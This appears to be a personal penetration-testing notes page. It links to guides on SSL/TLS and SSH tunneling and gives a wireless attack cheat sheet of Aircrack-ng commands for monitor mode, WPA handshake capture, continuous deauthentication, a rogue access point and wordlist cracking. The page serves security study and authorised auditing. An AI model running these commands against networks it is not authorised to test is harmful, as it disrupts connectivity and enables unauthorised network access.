Bypass Firewall - VPN restrictions

Pivoting - Tunneling

TODO Data Exfiltration

https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/

https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6


WIRELESS

Aircrack-ng Suite

  • Start monitor mode on specified interface
sudo airmon-ng start wlx983f9f1724c3
  • Change interface channel (for packet injection)
sudo iwconfig wlp0s20f3 channel 2
  • Listen connections to BSSID 04:25:E0:B1:E5:89 and save handshakes to file psk (use monitor interface)
sudo airodump-ng wlan0mon -d 04:25:E0:B1:E5:89 -w psk
  • Launch deauth attack on BSSID 04:25:E0:B1:E5:89 using wlp0s20f3 interface (packet injection)
sudo aireplay-ng --deauth 0 -a 04:25:E0:B1:E5:89 wlp0s20f3
  • Start rogue AP
sudo python3 rogue.py -i wlp0s20f3 --internet --auth wpa-personal --essid VSOUZA -c 4 -b 08:95:2A:AB:7E:E1 --wpa-passphrase testeeee
  • Crack handshakes
sudo aircrack-ng -w /usr/share/seclists/Passwords/rockyou.txt -b 9C:5D:12:50:AA:56 psk-*.cap

🌱 Back to Garden

3 items under this folder.